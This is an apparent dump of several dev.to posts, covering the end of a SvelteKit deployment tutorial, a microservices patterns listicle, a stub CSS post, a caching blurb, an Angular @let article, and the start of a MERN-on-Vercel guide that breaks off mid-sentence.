transmits changes to an associated state variable. A Svelte version of the above thus looks like this: ```javascript <script> let myProperty = ""; </script> <input bind:value={myProperty} /> ``` The bind keyword is also used to enable you to create two-way communication between parent and child components. This is a powerful feature. An interesting feature of Svelte is that it encourages you to use forms and server-side processing for input handling. Thus it's perfectly permissible in Svelte to launch a client-side function like this: ```javascript <script> let myProperty = ""; function commitChange() { // Use the global myProperty variable to update server storage } </script> <span>myProperty = </span><input bind:value={myProperty} /> <button on:click={commitChange}>Commit Change</button> /> ``` Svelte docs correctly insist that interactions like this are better handled by forms and server-side processing in a `+page.server.js` file. Here the validation and submission of the user input can be safely protected from the sort of interference possible in client-based code. Here also, any subsequent processing can be performed with maximum efficiency. To implement this view, Svelte provide a neat automatic link between a form reading data on a `+page.svelte` and a function handling the processing of that data in the associated `+page.server.js` file. Here's an example: ```javascript src/routes/login/+page.svelte <form method="POST"> <span>myProperty = </span><input name="myProperty"> <button>Commit Change</button> </form> src/routes/login/+page.server.js export const actions = { default: async (event) => { // TODO handle the processing for the input read by the form on +page.svelte } }; ``` Note that no Javascript has been used in the form - no "on click" or "on submit", for example. The linkage has been established entirely through "Svelte magic". In practice, of course, a `+page.svelte` file is likely to want to be the source of multiple "actions". See [Svelte Form Actions](https://kit.svelte.dev/docs/form-actions) for details of how Svelte manages this. (Note that Svelte docs are organised under two URLs: `kit.svelte.dev` for framework topics like routing and `svelte.dev` for elements of the language itself) Finally, to conclude this section, suppose you wanted users to be able to call on the service of an action by referencing it directly through a javascript "fetch" (or, at its simplest by launching a parameterised url via the browser - eg `https:// mySite/myPage?param1=3` etc). This is where you would use a `+server.js` file to create an API "endpoint" function. Firebase users might well use such an arrangement where they had previously used a Firebase function. Not the least advantage of this would be that testing and debugging could be done in the Sveltekit server rather than the Firebase emulator. ### Components * 1-way bindings Each `+page.svelte` file defines a component, and you mark variables declared here as "props" - ie make them accessible to "consumers" of the component - by adding the `export` keyword to their declarations. So, if you're still wondering how a `+page.svelte` file gets its data from `+page.server.js` - this is how it's done. A `+page.svelte` file wanting to receive "load" data from its `+page.server.js` (or `+page.js`) file just needs to put something like the following in its `<script>` section: ``` export let data ``` Svelte magic will then ensure that if the 'load' function exported by the `+page.server.js` file returns an object such as {name: "Benny", } then `+page.svelte` will find that `data.name` contains "Benny". But suppose that the `+page.svelte` file wanted to reference its own child component. How would that child be configured and linked to its parent? Let's say that this child component needs parameters `param1` and `param2` to build its output. It's usually most convenient to store the component in a `src/lib` folder - say `src/lib/MyComponent.svelte` - and its content might then look something like: ```javascript <script. export let param1; export let param2; </script> ... Svelte html referencing param1 and param2 ... ``` The parent `+page.svelte` could then engage the component like this: ```javascript <script> import { MyComponent } from "$lib/myComponent.svelte"; let param1 = "Type A"; let param2 = 10; <script/> <h1> Component-Access Demo Page </h1> <myComponent> {param1} {param2}; ``` This arrangement will be perfectly familiar if you've previously used React. Also, as with React, once the child component has received a parameter passed in this way, it's free to modify it at will - the parent will be oblivious of the change. This arrangement is known as a one-way binding Note the "$" shortcut used in the child component import declaration. Svelte works out the actual route automatically, saving you working out all the conventional "./" and "//" designators. * 2-way bindings Suppose the child component creates a form designed to serve both Create and Edit parents. In this case, it needs to be able to receive parameters supplying initial values for form elements and return the user inputs. Data is thus required to pass both down and up the component hierarchy. In React you might have used a Context here. Svelte provides several alternatives, each with different characteristics, but the simplest is a `bind:` keyword applied to the parameter references in the parent's component call. Let's say we've created the following shared input layout in a lib/MySharedInputPanel.svelte file: ```javascript <script> export let input1; export let input2; </script> <div> <span>Input1 value<span/> <input type="text" bind:value={input1} />&nbsp;&nbsp; <span>Input2 value<span/> <input type="text" bind:value={input2} /> </div> ``` This creates a default export for a MySharedInputPanel component that a `routes/editrecord/+page.svelte` file can import and use to build an edit 'form' for the named, exported inputs as follows: ```javascript <script> import MySharedInputPanel from "$lib/componentsMySharedInputPanel.svelte"; let input1 = "Initial Text"; let input2 = 3; </script> <h1>Edit Record</h1> <div> <MySharedInputPanel bind:input1 bind:input2 /> <p>Latest values: Input1 = {input1} : Input2 = {input2}</p>> </div> ``` If you try this out yourself, you'll see that the shared panel initially displays the input1 and input2 values specified in the edit record route and that the parent `editrecord/+page.svelte` view of these changes when new values are entered. This confirms that the route is automatically rerendering when changes occur. A `routes/createrecord/+page.svelte` could use the same form component to collect inputs and create a record. Note that, for brevity, I've used neither the `<form>` nor `<label>` elements that good practices would require. My code also assumes that the parents and child use the same variable names. See Svelte's "component directive" docs for a more general version of the bind: syntax. ### Svelte `store` Sometimes you'll find that you need a global state object to serve components that are not hierarchically related. Svelte `store` is designed to meet this need - and much more besides. A `store`, particularly a writable store (several variants exist), is an object with a `set()` method that allows you to set new values for its content. Why is this any different from good old Chrome `localStorage`? Potential readers of the store register their interest via a subscribe() method that sets a callback function that notifies them whenever the store value changes - Svelte store is reactive! I'll only describe the "writable" version of Svelte store here - the one that I, myself, have found most useful. In brief: A writable store is created using the following code pattern: ```javascript import { writable } from "svelte/store"; let myStoreContent = {myStoreField:"Welcome to SvelteStore"} export const myStore = writable(myStoreContent); ``` Now, if a component (or, indeed, a regular JavaScript module) needs to know if anything changes in the store, it can register its interest by supplying a callback function with a `subscribe` command along the lines of the following: ```javascript let currentMyStoreFieldValue myStore.subscribe((store) => { currentMyStoreFieldValue = store.myStoreField; }); ``` Note that, once you've created this arrangement, you never have to explicitly *read* your store, its current value remains available in your page's `currentMyStoreFieldsValue` for the duration of a browser session. A typical arrangement will be to use a `stores.js` file (usually positioned at the root of the src folder) to create a `store` object and then import this wherever it's needed. The javascript module system will ensure that the store is initialized the first time it is imported during the browser session. To update the store's value you can use the `set()` method again, but it may often be more convenient to use Svelte store's `update()` method as this gives you access to the current value of the store. Check out Svelte's docs at [Writable Stores](https://learn.svelte.dev/tutorial/writable-stores) if you'd like to see an example (and much else besides). ### Debugging techniques for SvelteKit webapps So, you've blasted your code through the myriad of shrieks and groans displayed by VSCode and Vite when they find errors such as undeclared variables and missing files. These are all usually easily fixed. But now you've got a webapp that runs - but all it does is sit and sulk. What now? The first thing, of course, is to open the browser's Inspector and see what the Console tab offers - there's almost always something to get a handle on here. Oh dear - CORS, Permissions, or similar error. What now?. Debugging a SvelteKit webapp tends to be a bit more complicated than, say, a React codebase because so much of your code is likely to be running "server-side". If you've followed this series rigorously, you'll likely now be a world expert in debugging client-side code using the Browser's Inspector. This, above all else, makes my own coding life the purest pleasure. But when you try to set breakpoints in a SvelteKit `+page.server.js` file, you'll find that the browser won't let you. Think about this for a moment. How can it? Code here runs either in the development server launched by npm run dev or in the live server where you've just deployed a package. This is just a black hole as far as the browser is concerned. So what do you do now? While you're still working on development code, VSCode offers you browser-like debugging facilities directly within your IDE. But personally. I've found these clunky and in practice I tend to rely simply on sprinkling `console.log` instructions over my code. Output for these appears in whatever terminal session you've used to launch your run npm dev. But what if you've got a problem that can only be investigated on the live host? Where would you go to look for log messages launched here? The answer, for a Google Cloud webapp is the "Google Cloud Logs Explorer" console. This, on first experience, is also quite a clunky brute. But, with experience, you'll appreciate that (rather like the browser's Inspector) it's a fine piece of software engineering that provides infinitely adaptable tools in one neat package. Embrace it! ### Building and Deploying a SvelteKit webapp to the Google Cloud If your webapp had been using React, as a Firebase developer you'd know that the next step is to use `npm run build` to create a runtime version of your code, followed by a `firebase deploy` to upload this to Google Cloud's Firebase hosting servers. But if you're using Svelte there's a problem. If your Sveltekit webapp uses server-side code to achieve its effects, you will need hosting for a Svelte server. Firebase hosting only serves webapp pages. You need a different type of hosting altogether - one that effectively lets you mimic the operation of the local Svelte server you've been running on your PC. Once you start looking closely, you'll discover that the Google Cloud provides a bewildering variety of facilities in this area. Typically, you might be interested in Google's "App Engine" and "Cloud Run" services. SvelteKit docs at [Building your App](https://kit.svelte.dev/docs/building-your-app) describe a build process that creates a "yaml" file that "provides an optimized production build of your server code and your browser code" serviced by an "adapter" to run on your specific environment (eg Google Cloud Run). But where would you find the necessary "adapter" and how would you choose the "specific environment"? Although Svelte provides official adapters for numerous environments (eg Netlify and Vercel) this list unfortunately doesn't include the Google Cloud. But "community" developers have stepped in and the one I've been using is called `svelte-adapter-appengine`, courtesy of Jonas Jongejan (HalfdanJ). This targets the Google Cloud App Engine environment (as described at [svelte-adapter-appengine README](https://github.com/HalfdanJ/svelte-adapter-appengine)) and so my requirement list is complete. Here's the procedure. 1. Install the package as a development dependency: `npm install --save-dev svelte-adapter-appengine` 2. Update your svelte.config.js to use the adapter: ```javascript import { vitePreprocess } from '@sveltejs/vite-plugin-svelte'; import adapter from "svelte-adapter-appengine"; /** @type {import('@sveltejs/kit').Config} */ const config = { preprocess: vitePreprocess(), kit: { adapter: adapter(), }, }; export default config; ``` 3. Build your application: `npm run build` 4. Deploy your application to App Engine: `gcloud app deploy --project <CLOUD_PROJECT_ID> build/app.yaml` Output from the deployment process will provide a url for your deployed webapp (eg https://myProject.nw.r.appspot.com). Feed that to the browser and be electrified by the shockingly fast response of your Sveltekit webapp. ### Postscript I hope you've enjoyed reading this post. Check out [NgateSystems](https://ngatesystems.com) for an index to the whole series and a super-useful keyword search facility. I'm conscious that I've only scratched the surface of what Svelte has to offer. This post has covered the basics and should be enough to enable you to develop a functional database access/maintenance system, but there's lots more to learn. Make sure that you check out Svelte docs for more information. Good luck with your coding. I, for one, shall certainly be using Svelte in future!
mjoycemilburn
1,919,534
19 Microservices Patterns for System Design Interviews
These are the common patterns for Microservice architecture which developer should learn for System Design interviews.
0
2024-07-14T09:36:37
https://dev.to/somadevtoo/19-microservices-patterns-for-system-design-interviews-3o39
microservices, softwaredevelopment, systemdesign, programming
--- title: 19 Microservices Patterns for System Design Interviews published: true description: These are the common patterns for Microservice architecture which developer should learn for System Design interviews. tags: Microservices, softwaredevelopment, systemdesign, programming # cover_image: https://direct_url_to_image.jpg # Use a ratio of 100:42 for best results. # published_at: 2024-07-11 09:50 +0000 --- *Disclosure: This post includes affiliate links; I may receive compensation if you purchase products or services from the different links provided in this article.* [![19 Microservices Patterns for System Design Interviews ](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b31ydwucircerujkyrnj.jpg)](https://bit.ly/3P3eqMN) image_credit - [ByteByteGo](https://bit.ly/3P3eqMN) Hello friends, if you are preparing for system design interviews then it make sense to to prepare for Microservices design patterns as well, not just to do well on interviews or make your architecture more robust but also to understand existing projects. Microservices patterns like Cicuit Breaker, API Gateway, Saga, Event Sourcing are tried and tested solution of common Microservices Problems. These patterns address [common challenges in microservices architectures](https://dev.to/somadevtoo/10-microservices-architecture-challenges-for-system-design-interviews-6g0) like scalability, fault tolerance, and data consistency. In the past, I have talked about common system design questions like [API Gateway vs Load Balancer](https://dev.to/somadevtoo/difference-between-api-gateway-and-load-balancer-in-system-design-54dd) and [Horizontal vs Vertical Scaling](https://dev.to/somadevtoo/horizontal-scaling-vs-vertical-scaling-in-system-design-3n09), [Forward proxy vs reverse proxy](https://dev.to/somadevtoo/difference-between-forward-proxy-and-reverse-proxy-in-system-design-54g5) as well common [System Design problems](https://dev.to/somadevtoo/top-50-system-design-interview-questions-for-2024-5dbk) and in this article I am going to share 24 key Microservices design patterns that are essential knowledge for technical interviews. They are also one of the [essential System design topics for interview](https://medium.com/javarevisited/top-10-system-design-concepts-every-programmer-should-learn-54375d8557a6) and you must prepare it well. Many companies use microservices, so understanding these patterns shows you're up-to-date with current trends. Knowing when and how to apply these patterns also demonstrates your ability to solve complex distributed system problems. These patterns often involve trade-offs, allowing you to showcase your analytical thinking and Interviewers often present scenarios where these patterns are relevant solutions. By the way, if you are preparing for System design interviews and want to learn System Design in depth then you can also checkout sites like [**ByteByteGo**](https://bit.ly/3P3eqMN), [**Design Guru**](https://bit.ly/3pMiO8g), [**Exponent**](https://bit.ly/3cNF0vw), [**Educative**](https://bit.ly/3Mnh6UR) and [**Udemy**](https://bit.ly/3vFNPid) which have many great System design courses and a System design interview template like this which you can use to answer any System Design question. [![how to answer system design question](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23jeu6ppweg5zt5prvhx.jpg)](https://bit.ly/3pMiO8g) If you need more choices, you can also see this list of [best System Design courses](https://www.linkedin.com/pulse/10-best-system-design-courses-beginners-experienced-2023-soma-sharma/), [books](https://www.linkedin.com/pulse/8-best-system-design-books-programmers-developers-soma-sharma/), and [websites](https://javarevisited.blogspot.com/2022/08/top-7-websites-to-learn-system-design.html) *P.S. Keep reading until the end. I have a free bonus for you.* So, what are we waiting for, let's jump right into it ## 19 Microservices Design Patterns for System Design Interviews [Microservices architecture](https://medium.com/javarevisited/difference-between-microservices-and-monolithic-architecture-for-java-interviews-af525908c2d5) is a design approach that structures an application as a collection of loosely coupled services. To build scalable, maintainable, and resilient microservices-based systems, various patterns have emerged. Here are essential microservices patterns you can use in your project and also remember for system design interviews. ### 1\. Service Registry Since there are many microservices in Microservice architecture they need to discover and communicate with each other. A [Service Registry](https://medium.com/javarevisited/service-registry-design-pattern-in-microservices-explained-a796494c608e), such as Netflix Eureka or Consul, acts as a centralized directory where services can register themselves and discover others. Here is how it looks like: [![Service Registry Pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a1zmvopa0oer8mo4qbas.png)](https://www.java67.com/2023/06/what-is-service-discovery-pattern-what.html) ------ ### 2\. API Gateway An [API Gateway](https://medium.com/javarevisited/what-is-api-gateway-pattern-in-microservices-architecture-what-problem-does-it-solve-ebf75ae84698) serves as a single entry point for client applications, aggregating multiple microservices into a unified API. It handles requests, routing them to the appropriate services, and may perform tasks like authentication, authorization, and load balancing. Here is how API Gateway looks like: [![API Gateway](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dquilct7nvdkgnn3tvrb.jpg)] (https://medium.com/javarevisited/what-is-api-gateway-pattern-in-microservices-architecture-what-problem-does-it-solve-ebf75ae84698) ----- ### 3\. Circuit Breaker Inspired by electrical circuit breakers, this pattern prevents a microservices failure from cascading to other services. [Circuit breaker pattern](https://medium.com/javarevisited/what-is-circuit-breaker-design-pattern-in-microservices-java-spring-cloud-netflix-hystrix-example-f285929d7f68) monitors for failures, and if a threshold is crossed, it opens the circuit, preventing further requests. This helps in graceful degradation and fault tolerance and its absolutely must in a Microservice architecture to prevent total shutdown of your services. Here is an example of Netflix Hysrix as Circuit breaker: [![Circuit Breaker](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4io0vvqpxxm5r61x2eco.png)](https://medium.com/javarevisited/what-is-circuit-breaker-design-pattern-in-microservices-java-spring-cloud-netflix-hystrix-example-f285929d7f68) ------- ### 4\. Bulkhead In a microservices system, isolating failures is crucial. The Bulkhead pattern involves separating components or services to contain failures. For example, thread pools or separate databases for different services can be used to prevent a failure in one part of the system from affecting others. Here is a diagram showing Bulkhead pattern in Microservices architecture: ![Bulkhead Pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/q1lmbv2z4alb9rn4c52f.png) ------ ### 5\. Saga Pattern This pattern is used for managing distributed transactions. The Saga pattern breaks down a long-running business transaction into a series of smaller, independent transactions. Each microservice involved in the saga handles its own transaction and publishes events to trigger subsequent actions. Here is how [Saga Pattern](https://medium.com/javarevisited/what-is-saga-pattern-in-microservice-architecture-which-problem-does-it-solve-de45d7d01d2b) looks in action: [![Saga Pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y2s5glp78opmqqumjbha.png)](https://www.java67.com/2022/12/saga-microservice-design-pattern-in-java.html) ------- ### 6\. Event Sourcing This is another popular pattern which is used heavily in high frequently low latency applications. In this pattern, instead of storing only the current state, [Event Sourcing](https://medium.com/javarevisited/what-is-event-sourcing-design-pattern-in-microservices-architecture-how-does-it-work-b38c996d445a) involves storing a sequence of events that led to the current state. This pattern provides a reliable audit trail and allows for rebuilding the system state at any point in time. Here is how Event Sourcing looks in action: [![Event Sourcing](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/czu6xk96dsluau2wvdlz.png)](https://www.java67.com/2023/01/event-sourcing-pattern-in-java.html) ------ ### 7\. Command Query Responsibility Segregation (CQRS) [CQRS Pattern](https://medium.com/javarevisited/what-is-cqrs-command-and-query-responsibility-segregation-pattern-7b1b38514edd) separates the read and write sides of an application. It uses different models for updating information (commands) and reading information (queries). This pattern can improve scalability, as read and write operations have different optimization requirements. Here is a nice diagram which shows CQRS pattern: [![Command Query Responsibility Segregation (CQRS)](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/y9cckf41czuapw0g8v5g.png)](https://javarevisited.blogspot.com/2023/04/what-is-cqrs-design-pattern-in.html) ------- ### 8\. Data Sharding Database sharing pattern is used to distribute the database load and avoid bottlenecks, [Data Sharding](https://dev.to/somadevtoo/database-sharding-for-system-design-interview-1k6b) involves partitioning data across multiple databases or database instances. In this pattern, each microservice may handle a subset of data or specific types of requests. Here is how database sharding looks like, credit - [Design Guru](https://bit.ly/3pMiO8g) [![Types of Database sharding](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/42ob2tziqrlt820gdsy7.jpg)](https://bit.ly/3pMiO8g) ------- ### 9\. Polyglot Persistence Different microservices may have different data storage needs. Polyglot Persistence allows using multiple database technologies based on the requirements of each microservice, optimizing for data storage, retrieval, and query capabilities. Here is a nice diagram which shows Polyglot persistence in Azure : ![Polyglot Persistence](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zadmkgdvmzkcvysmc4pa.PNG) ------- ### 10\. Retry In Microservice architecture, when a transient failure occurs, the Retry pattern involves retrying the operation instead of immediately failing. It can be applied at various levels, such as service-to-service communication or database interactions. Here is a nice diagram form [ByteByteGo](https://bit.ly/3P3eqMN), a great place for system design learning which shows Retry pattern in Microservices: ![Retry Pattern in Microservices](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e8kuq35ktdfxjfhecjoj.jpg) ------- ### 12\. Sidecar The Sidecar pattern involves attaching a helper service (the sidecar) to the main microservice to provide additional functionalities such as logging, security, or communication with external services. This allows the main service to focus on its core functionality. Here is how a Sidecar pattern looks like: ![Sidecar pattern in Microservices](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/imhtu2b7mml6atekcqu6.png) ----- ### 13\. Backends for Frontends (BFF) Also known as BFF this pattern is useful when dealing with multiple client types (e.g., web, mobile), the BFF pattern involves creating separate backend services tailored for each type of client. This allows for optimized and specialized APIs for each client. Here is how a Backends for Frontends (BFF) pattern looks like: ![Backends for Frontends (BFF)](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p1tdrwa7bzotkohzitpr.png) ------ ### 14. Shadow Deployment The Shadow Deployment pattern involves routing a copy (shadow) of production traffic to a new microservice version without affecting the actual user experience. This is one of the popular deployment strategy and it helps validate the new version's performance and correctness. Here is how shadow deployment looks like ![Shadow Deployment](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dopj5ojhur8zk8g84ytz.png) ------ ### 15\. Consumer-Driven Contracts In a microservices ecosystem, multiple services often interact with one another. The Consumer-Driven Contracts pattern involves consumers specifying their expectations from producers, allowing for more robust and coordinated changes. Here is a nice diagram which explains Consumer Driven contracts [![Consumer-Driven Contracts](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/lks09b6cxuhwea5la5pp.png)](https://javarevisited.blogspot.com/2021/09/microservices-design-patterns-principles.html) ----- ### 16\. Smart Endpoints, Dumb Pipes This pattern advocates for placing business logic in microservices (smart endpoints) rather than relying on complex middleware. The communication infrastructure (pipes) should be simple and handle only message routing. ------ ### 17\. Database per Service This is another popular Microservices pattern where each microservice has its own database, and services communicate through well-defined APIs. [Database per Service pattern](https://javarevisited.blogspot.com/2022/11/database-per-microservice-pattern-java.html) provides isolation but also requires careful consideration of data consistency and integrity. Here is how this pattern looks like: [![Database per Service pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p1618z10nohkuvlyjl3a.png)](https://medium.com/javarevisited/what-is-database-per-microservices-pattern-what-problem-does-it-solve-60b8c5478825) ------- ### 18\. Async Messaging Instead of synchronous communication between microservices, the Async Messaging pattern involves using message queues to facilitate asynchronous communication. This can improve system responsiveness and scalability. Here is a nice diagram which shows difference between sync and async messaging [![Async Messaging pattern](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gwi955d8eatod6zzmezh.png)](https://medium.com/javarevisited/how-microservices-communicates-with-each-other-synchronous-vs-asynchronous-communication-pattern-31ca01027c53) ------- ### 19\. Stateless Services Designing microservices to be stateless simplifies scalability and resilience. Each service processes a request independently, without relying on stored state, making it easier to scale horizontally. Here is a nice diagram which shows the difference Stateless Services and Stateful Services [![Stateless Services](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qz3x92cb4v9yqoqqaqe3.png)](https://dev.to/somadevtoo/10-microservice-best-practices-for-building-scalable-and-resilient-apps-1p0j) ------- ### System Design Interviews Resources And, here is my curated list of best system design books, online courses, and practice websites which you can check to better prepare for System design interviews. Most of these courses also answer questions I have shared here. 1. [**DesignGuru's Grokking System Design Course**](https://bit.ly/3pMiO8g): An interactive learning platform with hands-on exercises and real-world scenarios to strengthen your system design skills. 2. [**"System Design Interview" by Alex Xu**](https://amzn.to/3nU2Mbp): This book provides an in-depth exploration of system design concepts, strategies, and interview preparation tips. 3. [**"Designing Data-Intensive Applications"**](https://amzn.to/3nXKaas) by Martin Kleppmann: A comprehensive guide that covers the principles and practices for designing scalable and reliable systems. 4. [LeetCode System Design Tag](https://leetcode.com/explore/learn/card/system-design): LeetCode is a popular platform for technical interview preparation. The System Design tag on LeetCode includes a variety of questions to practice. 5. [**"System Design Primer"**](https://bit.ly/3bSaBfC) on GitHub: A curated list of resources, including articles, books, and videos, to help you prepare for system design interviews. 6. [**Educative's System Design Cours**](https://bit.ly/3Mnh6UR)e: An interactive learning platform with hands-on exercises and real-world scenarios to strengthen your system design skills. 7. **High Scalability Blog**: A blog that features articles and case studies on the architecture of high-traffic websites and scalable systems. 8. **[YouTube Channels](https://medium.com/javarevisited/top-8-youtube-channels-for-system-design-interview-preparation-970d103ea18d)**: Check out channels like "Gaurav Sen" and "Tech Dummies" for insightful videos on system design concepts and interview preparation. 9. [**ByteByteGo**](https://bit.ly/3P3eqMN): A live book and course by Alex Xu for System design interview preparation. It contains all the content of System Design Interview book volume 1 and 2 and will be updated with volume 3 which is coming soon. 10. [**Exponent**](https://bit.ly/3cNF0vw): A specialized site for interview prep especially for FAANG companies like Amazon and Google, They also have a great system design course and many other material which can help you crack FAANG interviews. [![how to prepare for system design](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkqv3p46jmw5qc0newuiu.jpg)](https://bit.ly/3P3eqMN) image_credit - [ByteByteGo](https://bit.ly/3P3eqMN) ------ That's all about the **common Microservice patterns and concepts a developer should know**. These microservices patterns help address various challenges associated with building and maintaining distributed systems, providing solutions for communication, fault tolerance, data management, and scalability. When designing microservices architectures, combining these patterns judiciously can lead to a robust and resilient system. These additional [microservices patterns](https://medium.com/javarevisited/top-10-microservice-design-patterns-for-experienced-developers-f4f5f782810e), when applied thoughtfully, contribute to building resilient, scalable, and maintainable distributed systems. The choice of patterns depends on the specific requirements and challenges faced during the design and implementation of microservices architectures. ### Bonus As promised, here is the bonus for you, a free book. I just found a new free book to learn Distributed System Design, you can also read it here on Microsoft --- <https://info.microsoft.com/rs/157-GQE-382/images/EN-CNTNT-eBook-DesigningDistributedSystems.pdf> [![free book to learn distributed system design](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhrc1jn751mzs4ru91zt3.png)](https://media.dev.to/cdn-cgi/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhrc1jn751mzs4ru91zt3.png) Thank you
somadevtoo
1,919,582
CSS All Tricks and Tips - Part 1
Index of this Post how to center container How to center container 'San...
0
2024-07-11T10:51:41
https://dev.to/jaiminbariya/css-all-tricks-and-tips-part-1-1c6d
## Index of this Post 1. [ how to center container ](#chapter-1) ### How to center container <a name="chapter-1" ></a> 'San Salvador 'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador'San Salvador ``` `print("Hello JP")` ``` ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/yrrltexzpsxhfejddci1.png)
jaiminbariya
1,919,668
The Benefits of Caching: Improving Web Performance and Responsiveness
Have you ever visited a website that was slow to load or experienced inconsistent performance?...
0
2024-07-16T07:00:00
https://devot.team/blog/benefits-of-caching
caching, webdev, programming
Have you ever visited a website that was slow to load or experienced inconsistent performance? Caching can solve these issues and more. In this article, we'll explore caching, how it works, and where it can be applied to improve website performance. We'll also discuss some common bottlenecks and scenarios where caching should be used. Whether you're a developer, DevOps, or end user, caching can play a role in improving your experience with web applications. **What is caching?** As defined on AWS’s site, a cache in computing, is a high-speed data storage layer which stores a subset of data, typically transient in nature, so that future requests for that data are served up faster than is possible by accessing the data’s primary storage location. Caching allows you to efficiently reuse previously retrieved or computed data. When should we use caching? Using a cache can be very useful. Here are some common scenarios where caching should be used: - When a website or application is slow to load - When infrastructure costs are too high - When infrastructure resource monitors display high values - When a website or application has inconsistencies in visits or load - When developers have done a poor job implementing existing features You can read more about it on our blog https://devot.team/blog/benefits-of-caching
ana_klari_e98cbb26da5af3
1,919,697
@let: New feature compiler in Angular 18.1
Introduction With the arrival of Angular 18.1, this version introduces an exciting new...
0
2024-07-17T09:19:30
https://dev.to/this-is-angular/let-new-feature-compiler-in-angular-181-jen
angular, news, javascript, webdev
## Introduction With the arrival of Angular 18.1, this version introduces an exciting new feature to the compiler: the ability to declare one or more template variables. How is this feature used, and what are the different use cases? This article aims to answer. ## The compiler's latest feature: @let With the latest versions of Angular, the team has introduced new functionality into the compiler, and this functionality translates into the _@-syntax_. This is how the new control flow syntax came into being - @if - @for - @switch and, more recently, **@let** As a general rule, the easiest way to create a template variable was to use the - the *ngIf structural directive with the keyword as keyword or using the new control flow syntax - @if with the keyword as ```html <!-- older control flow syntax --> <div *ngIf="user$ |async as user"> {{ user.name }} </div> <!-- new control flow syntax --> @if(user$ |async; as user){ <div>{{ user.name }}</div> } ``` This handy feature allowed us to store the result of the async pipe in a variable for use later in the template. However, this syntax raises a few questions. Here, the condition checks whether the return of the async pipe is true, and therefore whether the return value is different from any value considered false in javascript. This condition will work really well if the return is an object or an array. but if the return is a number and particularly the number 0 ```html @if(((numbers$ |async) !=== undefined || (numbers$ |async) !=== null) ; as myNumber){ <div>{{ myNumber }}</div> } ``` This is where @let comes in. @let doesn't check a condition, it just allows you to declare a local template variable in a simple way so the code example above becomes much simpler and more elegant to write ```html @let myNumber = (numbers$ | async) ?? 0; <div>{{ myNumber }}</div> ``` This way the myNumber variable will always be displayed. ## The different ways of using @let One of the most classic scenarios with variable declaration is to store the result of a complex expression. It has always been inadvisable to use a function in a condition. The use of a function in a condition had an impact on performance in the sense that at the slightest mouse movement, or change in the template, the function was re-evaluated. @let, as described above, does not evaluate, but simply declares a local variable. This variable will be reevaluated only if one of its dependencies changes. So calling a function is not a bad idea for expressions such as complex expression. ```html <ul> @for(user of users(); track user.id) { @let isAdmin = checkIfAdmin(user); <li>User is admin: {{ isAdmin }}</li> } </ul> ``` ### Use the @let with signals @let is compatible with signals, and is used as follows ```html @let userColor = user().preferences?.colors?.primaryColor || 'white'; <span>user favorite color is {{ userColor }}</span> ``` ### @let and javascript expression As you can see, @let can be used to evaluate any kind of javascript expression, apart from, for example, the instantiation of a class In this way, arithmetic operators are interpreted and several variables can be declared on several different lines or just on one line. ```html <div> @for (score of scores(); track $index) { @let total = total + score, max = calcMax(score); <h1>final score: {{ total }}</h1> } </div> ``` ## Other cool things that @let brings As described above, the behaviour of @let is very similar to the behaviour of let in javascript, which has the following benefits - the scope works like the let scope in javascript - better typing interference in the template - an error is raised if a variable (let) is used before being declared
nicoss54
1,919,795
Setting up a full-stack MERN (MongoDB, Express, React, Node.js) app for deployment on Vercel.
The MERN stack, comprising MongoDB, Express, React, and Node.js, is one of several technological...
0
2024-07-14T00:17:00
https://toki-adedapo.com/setting-up-a-full-stack-mern-mongodb-express-react-nodejs-app-for-deployment-on-vercel
serverless, node, react, mongodb
The MERN stack, comprising MongoDB, Express, React, and Node.js, is one of several technological combinations used for building full-stack web applications. Vercel provides a versatile platform capable of deploying a wide range of frameworks and technologies for various project types. While often associated with frontend hosting, Vercel also supports backend deployments, making it suitable for MERN applications. This article will guide you through the process of setting up a MERN stack application and deploying it on Vercel. We'll cover the steps from local development to deployment, showing how to utilize Vercel's free tier for testing your project and, if desired, hosting it long-term. By the end of this guide, you'll understand how to leverage the MERN stack and Vercel's deployment capabilities to bring your web application online and make it accessible to users. **Setting up the Development Environment** To beign, you'll need to install the following tools: 1. Node.js and npm - Visit [https://nodejs.org/en/download/package-manager](https://nodejs.org/en/download/package-manager) - Download and install the LTS (Long Term Support) version - This installation includes npm (Node Package Manager) 2. Visual Studio Code (VS Code): - Visit [https://code.visualstudio.com/download](https://code.visualstudio.com/download) - Download and install the version appropriate for your operating system After installation, verify that Node.js and npm are correctly installed by opening a terminal or command prompt and running: ``` node --version npm --version ``` Output>>>>> ``` Microsoft Windows [Version 10.0.22000.3079] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>node --version v18.14.2 C:\Windows\system32>npm --version 9.5.0 C:\Windows\system32> ``` **Creating a new React app** 1. Open your terminal or command 